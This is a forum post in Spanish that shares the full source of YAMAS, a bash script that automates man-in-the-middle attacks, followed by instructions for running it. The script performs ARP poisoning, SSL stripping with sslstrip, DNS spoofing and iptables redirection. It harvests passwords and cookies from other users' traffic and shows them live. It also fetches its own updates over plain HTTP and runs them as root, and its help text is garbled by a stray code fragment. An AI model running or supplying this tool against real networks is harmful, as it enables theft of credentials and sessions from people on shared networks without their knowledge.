YAMAS es una herramienta que tiene como objetivo facilitar los ataques MITM automatizando todo el proceso, desde la activación del reenvío IP y la modificación de iptables hasta el envenenamiento de la caché ARP (ya sea usando ettercap o arpspoof). El tráfico SSL se elude con el conocido sslstrip 0.9. Aunque cualquier script MITM hace eso, Yamas tiene una característica única y apreciada: analiza los registros mientras el ataque sigue en marcha, de modo que las credenciales se muestran a medida que se capturan. Además, se puede interactuar con distintas opciones mientras el ataque se está ejecutando (escanear la red, pausar el ataque, capturar imágenes, ...)
Video:
link: http://www.youtube.com/watch?v=mXoj4kTCIQM
Además, esta versión está modificada para que, aparte de capturar las credenciales, también capture todas las cookies (y las filtre) en un cómodo archivo de texto (sin mencionar la traducción al español).
[color=#000000]# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Traducido por vk496 para seguridadwireless.net
# CookieMod by vk496
# Release stamp of this copy; the update check further down compares it
# against the value fetched from the project server.
version="20130313"
# Root is only warned about, not enforced: a non-root run prints the message
# below, waits three seconds and carries on.
if [ $UID -ne 0 ]; then
echo -e "�33[31Este programa debería ejecutarse como root.
Seguramente fallara.�33[m"
sleep 3
fi
# Directory that saved logs, cookies and password files are copied to on exit
# (`~`, i.e. the home directory of whoever runs the script).
log_output_dir=~
# Location of a non-installed sslstrip checkout, used when /usr/bin/sslstrip
# does not exist.
sslstrip_dir=/usr/share/sslstrip
# 'y' enables the "install to /usr/bin/yamas" prompts.
ask_for_install=y
if [ ! -d "$log_output_dir" ]; then
# NOTE(review): unquoted here although the test above quotes the same variable.
mkdir -p $log_output_dir
fi
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
# fast_cleanup: SIGINT handler.
# Kills the helper processes whose PIDs were recorded, turns IP forwarding off,
# flushes iptables and exits 0. Unlike cleanup(), it asks nothing and removes
# no files, so whatever the run wrote under /tmp stays on disk after ^C.
# Globals read: looparseid, sslstripid, dnsid, etterspoofid, etter
fast_cleanup()
{
echo -e "nn�33[31m ^C Capturado. Limpiando y saliendo.�33[m"
# Each PID is only signalled if the variable was ever set.
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
# NOTE(review): killall matches by process name, so it also ends any
# ettercap/arpspoof instance on the host that this script did not start.
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
# NOTE(review): forwarding is forced to 0 and the filter and nat tables are
# emptied completely (rules and user-defined chains). Nothing in the code shown
# saves the previous ip_forward value or ruleset, so a host that had its own
# firewall rules or was meant to route is left without them after this runs.
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
echo -e "�33[32m[-] Limpieza realizada con exito !�33[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
# The file written here is the keyword list that the parsing pipelines read
# with `egrep -f /tmp/grepcred.txt`.
# NOTE(review): fixed, predictable name in the world-writable /tmp, written on
# every start (normally as root); a pre-existing file or symlink at that path is
# written through. The file is not removed anywhere in the code shown, so it
# remains on disk as a trace of the tool having been run.
echo -e "credentialnemailnlastnlognmodifiednnamennicknamenpassnpersistentnpwnsessionntextboxnusernwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No se ha especificado ningun archivo de entrada. Saliendo... nuso : $0 -p <file>"
exit 0
fi
clear
echo -e "Analizando $2 para creedenciales.nn"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = t"$2; getline; print $n"n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = t"$2"n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = t"$2}' |
uniq
cat $2 | grep -a -e "cookie :" -e "host :" | awk '/host/&&!t{t=$0} /cookie/&&t{print t;print;t=""}' | awk '{$1=""; $2=""; $3=""; $4=""; print}' | sed '/host/i ' | sed -e 's/^ *//' >/tmp/cookies.txt
exit 0 ;;
-pl) while :
do
clear
echo -e "Analizando $2 para creedenciales.nn"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = t"$2; getline; print $n"n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = t"$2"n";
else if ($1 ~/available/) print "";
else if ($1 ~/last/) print "";
else print "Login = t"$2}' |
uniq
cat $2 | grep -a -e "cookie :" -e "host :" | awk '/host/&&!t{t=$0} /cookie/&&t{print t;print;t=""}' | awk '{$1=""; $2=""; $3=""; $4=""; print}' | sed '/host/i ' | sed -e 's/^ *//' >/tmp/cookies.txt
sleep 3
done ;;
-e | --etter) echo -e "tVas a usar Ettercap en vez de ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "Estas ejecutando $0, version $version.
Uso : $0 -h -c -p -e -s -f
-h o --help : Muestra este mensaje de ayuda, aviso legal y sale.
-c o --change: Muestra changelog.
-e : Utilice ettercap en lugar de ARPspoof. Podriamos tener razones propias ...
ARPspoof es el predeterminado.
-p or --parse : Solo analizar un <file>. No utilize caracteres comodines.
Utilice> / output_file para imprimir en un archivo.
-s : Modo invisible. El script no se descarga nada.
-f : Utilice padlock favicon en sslstrip.
�33[31m EXENCION DE RESPONSABILIDAD :�33[m
Este programa esta ha sido creado con el unico proposito del aprendizaje.
No justifico la pirateria y no sere responsable de sus acciones.
Puede enfrentarse a consecuencias legales si utiliza este script
para actividades ilegales.
�33[31m Lo que creo que se debe aprender de este script :�33[m
Este script le enseñara lo facil que es obtener credenciales en linea
sensible y como protegerse de ello, a condicion de que entiende
lo que hace el programa. La mejor manera de entender lo que hace es
buscar en su origen. Esto también le ayudara a entendre algunas
secuencias basicas de comandos shell."
exit 0 ;;
-c | --change)
clear
echo -e "�33[31m Changelog :�33[m
ToDo :
- FakeSSL -> Need help
�33[31mFeatures :�33[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save "dumped" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
�33[31m Credits :�33[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to thif [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. nusage : $0 -p <file>"
exit 0
fie people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tin y url.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "Stealth mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
-t)
time="$4" ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
# Unless -s was given, the banner text is fetched from the project server over
# plain HTTP and kept in $message.
# NOTE(review): $message is later printed with `echo -e`, so whatever the server
# (or anything on the network path) returns is interpreted for escape sequences
# in the operator's terminal.
if [[ "$silent" = "1" ]]; then
message="nNo se mostrara ningun mensaje : esta en modo silencioso"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
# NOTE(review): this branch tests $1/$2 rather than $silent. The option loop
# above only ends once "$1" is empty, so this test looks like it can never be
# true and the wget below would run even with -s; "silent" mode would then
# still produce an outbound HTTP request to comax.fr. Confirm.
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "Las tablas ASCII no estaran disponibles."
echo "Las tablas ASCII no estan disponibles porqu esta en modo silecioso." > /tmp/ascii
else
# Fixed path in /tmp, fetched over unauthenticated HTTP.
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
# Self-update. Skipped when $silent is 1; otherwise the changelog and the latest
# version stamp are fetched over plain HTTP and compared with $version.
#
# NOTE(review): the whole update path is unauthenticated. The replacement script
# is downloaded over HTTP straight onto "$0", marked executable and re-executed,
# with no checksum or signature and (given the root check at the top) normally
# as root. Whoever controls the server, its DNS answer or the network path
# decides what runs next on the operator's machine. Treat any copy of this
# script that has ever self-updated as unverified code.
if [[ "$silent" = "1" ]];then
echo "No se comprueba nuevas versiones : Modo silecioso."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
# Inside [[ ]] the > operator is a string comparison, not a numeric one; the
# right-hand side is whatever the server returned.
if [[ $last_version > $version ]];then # Comparing to current version
# $changelog is server-supplied text printed through `echo -e`.
echo -e "You are running version �33[31m$version�33[m, do you want to update to �33[32m$last_version�33[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "[+] Updating script..."
# Overwrites the running script in place; $0 is unquoted.
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with "yamas" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
# Runs the freshly downloaded copy (found via PATH), then this process exits
# with status 1 once that copy returns.
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
# Re-executes the just-downloaded file without passing the original arguments.
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
# Offers to install the script system-wide when /usr/bin/yamas does not exist
# and $ask_for_install is 'y'. On "Y"/"y" the running file is copied to
# /usr/bin/yamas, made executable, the original file is deleted, and the
# installed copy is started; this process then exits with status 1.
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
# NOTE(review): $0 is unquoted in cp/rm, and the copy is not checked before the
# original is removed.
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
# Resolved through PATH, and started without the original arguments.
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script instalado"
sleep 1
fi
### End of install process
clear
echo -e "
`YMM' `MM' db `7MMM. ,MMF' db .M"""bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI "Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. `MMb.
VMMP ,M `MM M Mb M' MM ,M `MM `YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . `MM
MM A' VML M `YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. `' .JMML..AMA. .AMMA.P"Ybmmd" " # <= I love it.
echo -e "===========================================================================
=�33[31m Welcome to Yet Another MITM Automation Script.�33[m =
=�33[31m Use this tool responsibly, and enjoy!�33[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tin y url.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version �33[32m$version�33[m =
==========================================================================="
echo -e "�33[36mMensaje del dia :�33[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
# NOTE(review): this runs before anything else is set up and is destructive for
# the host itself: IP forwarding is switched off and every rule and user-defined
# chain in the filter and nat tables is deleted. The previous state is not saved
# in the code shown, so an existing host firewall is gone from this point on and
# is not put back by either cleanup routine.
echo -e "�33[31m [+] Limpiando iptables �33[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Limpiado."
# Defining exit function and other ending features
# cleanup: orderly shutdown, reached from option 6 of the final() menu.
# Stops the helper processes, resets forwarding and iptables, then asks three
# times whether to keep the raw log, the cookie file and the parsed passwords.
# Globals read: sslstripid, looparseid, drifton, etter, log_output_dir, filename
#
# Files touched (useful when examining a machine this was run on):
#   /tmp/$filename.txt                  raw log, deleted at the end
#   /tmp/cookies.txt                    copied on request, not deleted here
#   /tmp/driftnet*                      copied to the capture directory, not deleted here
#   $log_output_dir/$filename.txt       kept only on "Y"
#   $log_output_dir/cookies.txt         kept only on "Y"
#   $log_output_dir/$filename.pass.txt  kept only on "Y", appended to
#   $log_output_dir/capture_<ddmmyy>/   created when driftnet was used
cleanup()
{
echo
echo -e "�33[31m[+] Matando procesos y reseteando iptables.�33[m"
# NOTE(review): unlike fast_cleanup, these two are not guarded against an
# empty PID variable.
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "�33[31mIMMA KILL THIS DRIFTNET BITCH�33[m" #It's between him and me.
if [[ ! -e $log_output_dir/capture_$(date +%d%m%y) ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir/capture_$(date +%d%m%y) #create if needed
fi
# The glob matches anything named driftnet* in /tmp, not only this run's output.
cp /tmp/driftnet* $log_output_dir/capture_$(date +%d%m%y) #copy all content from driftnet's temp folder to destination
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
# killall works by process name and is not limited to processes this script started.
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
# NOTE(review): same full reset as at start-up - forwarding forced to 0 and the
# filter and nat tables emptied; the host's earlier ruleset is not restored.
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
echo -e "�33[32m[-] Limpieza realizada con exito !�33[m"
echo -e "nDesea guardar el log para revisarlo mas tarde o deberia ser eliminado? (Y=Guardar)"
echo "(Si desea guardarlo, se alojará en $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
# $filename comes from an interactive prompt and is used unquoted in paths.
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log copiado !" #it does
else echo "Error mientras se copiaba el log. Entra en /tmp/ para $filename.txt" #it does not
fi
else
echo "Archivos temporales no guardados"
fi
echo -e "nDesea guardar las cookies en un archivo? (Y=guardar)"
echo "(Si desea guardarlo, se almacenara en $log_output_dir/cookies.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
# NOTE(review): the copy lands in the output directory with default
# permissions, and /tmp/cookies.txt itself is never removed in the code shown,
# whichever answer is given.
cp /tmp/cookies.txt $log_output_dir/cookies.txt #moving file
if [ -f "$log_output_dir/cookies.txt" ]; then #check if it exists
echo "Log file copiado !" #it does
else echo "Error al copiar archivo de registro. Mirar /tmp/ for cookies.txt" #it does not
fi
else
echo "Cookies no guardadas"
fi
echo -e "nDesea guardar las contraseñas en un archivo? (Y=Guardar)"
echo "(Si desea guardarlo, se alojará en $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
# The parsed result is stored in clear text and appended to any earlier file of
# the same name.
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = t"$2; getline; print $n"n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = t"$2"n";
else print "Login = t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
# This only checks that the file exists, which is also true when it was left
# over from an earlier run.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Contraseñas guardadas !" #it does
else
echo "Error mientras se guardaban las contraseñass" #it does not
fi
else
echo "Guardado de contraseñas omitido."
fi
# Only the raw log is deleted, with a plain unlink (no overwrite).
rm /tmp/$filename.txt
echo -e "nArchivos temporales eliminados."
exit
}
search=$(ip route show | grep src | awk '{ print $1}') #store gateway/24 for whole network mapping to variable
#Si no se pone 'grep src', cogerá la subnet "127.0.0.0/8" (vk496)
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "�33[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "�33[m"
final
}
add_target()
{
echo "Itroduzca la nueva IP para atacar :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Introduzca su lista de redireccionamiento linea por linea. Termine con #.
Ejemplo : 127.0.0.1 foo.bar.com
Puede usar caracteres comodines."
if [ -e '~/hosts_spoof']; then
rm ~/hosts_spoof
fi
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "Si tiene un archivo host, introduzca su ruta. Si no es así, pulse ENTER."
read gothost
if [[ $gothost != "" ]];then
echo "El archivo de host $gothost será usado."
else
echo -e "Vamos a hacer uno...n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Desea usar Ettercap 'dns_spoof' plugin o dnsspoof (E/D) ? Pulse A para abortar"
read spoofpgm
case $spoofpgm in
E) echo "Usaremos ettercap. Asegurate de haber editado /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "Usaremos dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Opcion incorrecta. Pulse E o D"
choose_dns;;
esac
final
}
misc()
{
echo -e "nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
image_menu()
{
echo -e "Desea usar driftnet (mostrar imagenes) o tcpxtract ?
1. Tcpxtract (Guarda todas las imagenes a $log_output_dir/capture[date])
2. Driftnet (Muestra todas las imagenes en pantalla y las guarda en $log_output_dir/capture[date])"
read image_choice
case $image_choice in
1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
drifton=2
echo "tcpxtract se ha ejecutado con el pid $tcpid"
misc ;;
2) driftnet -i $iface -d /tmp/ &> /dev/null &
drifton=1
echo "Driftnet ejecutado."
misc ;;
esac
}
rtparse()
{
echo -e "nnEn este menu puede pausar, reanudar, cerrar o ejecutar
el analisis en vivo (RTP).
1. Pausar RTP (mantiene xterm abierto para que lea, copie-pegue, etc.)
2. Reanudar RTP.
3. Cerrar RTP (detiene y cierra xterm)
4. Re-lanzar RTP
5. Menu anterior."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "�33[33m[+]Pausando...�33[m"
kill -19 $looparseid
echo -e "�33[33m[-]Pausado.�33[m"
rtparse;;
2) echo -e "�33[33m[+]Reanudando...�33[m"
kill -18 $looparseid
echo -e "�33[33m[-]Reanudado.�33[m"
rtparse;;
3) echo -e "�33[31m[+]Cerrando...�33[m"
kill $looparseid
echo -e "�33[33m[-]Cerrado.�33[m"
rtparse;;
4) echo -e "�33[32m[+]Lanzando...�33[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e $0 -pl /tmp/$filename.txt & looparseid=$!
sleep 2
echo -e "�33[33m[-]Lanzado.�33[m"
rtparse;;
5) echo "Anterior"
final ;;
*) echo -e "�33[31mMala eleccion chaval !�33[mn" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "n�33[32mEl ataque se esta ejecutando�33[m. Puede :
1. Reanalizar la red.
2. Añadir objetivo (Inutil si es sobre toda la red).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Introduzca el numero de la opcion deseada."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "�33[31mMala eleccion tio !�33[mn" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
# Host-side state changed by this section, and therefore visible to anyone
# inspecting the machine while the script runs:
#   - /proc/sys/net/ipv4/ip_forward is set to 1
#   - one REDIRECT rule is appended to the nat PREROUTING chain, sending TCP
#     traffic for $inport (default 80) to local port $outport (default 8080)
echo
echo -e "�33[31m [+] Activando IP forwarding... �33[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activado."
#Iptables
echo
echo -e "�33[31m [+] Configurando iptables...n �33[m"
echo -en "�33[31m Hacia �33[mque puerto debe ser redirigido el trafico? (por defecto = 8080)"
echo
read -e outport
# An empty answer selects the default listening port.
if [ "$outport" = "" ];then
outport=8080
echo -e "Puerto $outport seleccionado como predeterminado.n"
fi
echo -en "�33[31m Desde �33[mque puerto debe ser redirigido el trafico? (por defecto = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Puerto $inport seleccionado como predeterminado.n"
fi
echo -e "n�33[33m El trafico del puerto $inport se redirige al puerto $outport �33[m"
# NOTE(review): both values come straight from the prompts and are passed to
# iptables unquoted and unvalidated (no check that they are port numbers); the
# exit status of iptables is not checked before "Traffic rerouted" is printed.
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "�33[31m [+] Activating sslstrip... �33[m"
echo "Elija el nombre del archivo : (Por defecto = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "�33[33m Sslstrip escucha en el puerto $outport y se guarda el log en /tmp/$filename.txt�33[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip esta ejecutandose." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "�33[31m [+] Activando ARP envenenamiento de cache... �33[m"
echo
ip route show | awk '(NR == 1) { print "Puerta de enlace :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Escriba la direccion IP de la puerta de enlace o pulse Intro para utilizar $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway seleccionado como predeterminado.n"
fi
echo
echo "Que interfaz le gustaria usar? Debe coincidir con puerta de enlace IP como se muestra arriba. Pulse Intro para usar $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface seleccionado como predeterminado.n"
fi
echo -e "r"
echo -e "Nos concentraremos en toda la red de forma predeterminada. Usted puede �33[4mD�33[mescubrir hosts e introducir IP(s) de forma manual �33[4mD�33[m..
Pulsa INTRO para elegir por defecto."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "nDesea escanear la red en busca de hosts activos? (Y/N) [Esto puede tardar hasta 30 segundos, sea paciente]"
read -e hosts
echo -e "�33[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "�33[m " # switch color back to white
else
echo -e "�33[m "
fi
echo -e "Por favor, introduzca las IP(s) de la siguiente forma : IP1 IP2 IP3...
�33[31m Cuidado! Esto se generan tantas ventanas como blancos de entrada y podría ralentizar actuaciones. Si ese fuera el caso, a continuacion, utilizar la orientación de toda la red.�33[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Envenenando $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "�33[33m Lanzando $parameters en $gateway desde $iface con ARPspoof�33[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Envenenando $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "�33[33m Lanzando $parameters en $gateway desde $iface con Ettercap�33[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "�33[33m Lanzando sobre toda la red en $gateway desde $iface con Ettercap�33[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "�33[33m Lanzando sobre toda la red en $gateway desde $iface con ARPspoof�33[m"
fi
fi
echo -e "[-] ARP envenenamiento de cache se ha ejecutado. �33[31m Deja la(s) nueva(s) ventana(s) ejecutandose. �33[m"
echo -e "n�33[32m El ataque debería estar ejecutandose dentro de poco, disfruta.�33[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e $0 -pl /tmp/$filename.txt & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas. [/color]
Para usarlo, guardamos el código en un archivo (yamas, por ejemplo)
Le damos permisos de ejecución
chmod +x yamas
Y lo abrimos:
./yamas -s
Página del proyecto: http://comax.fr/yamas.php
Salu2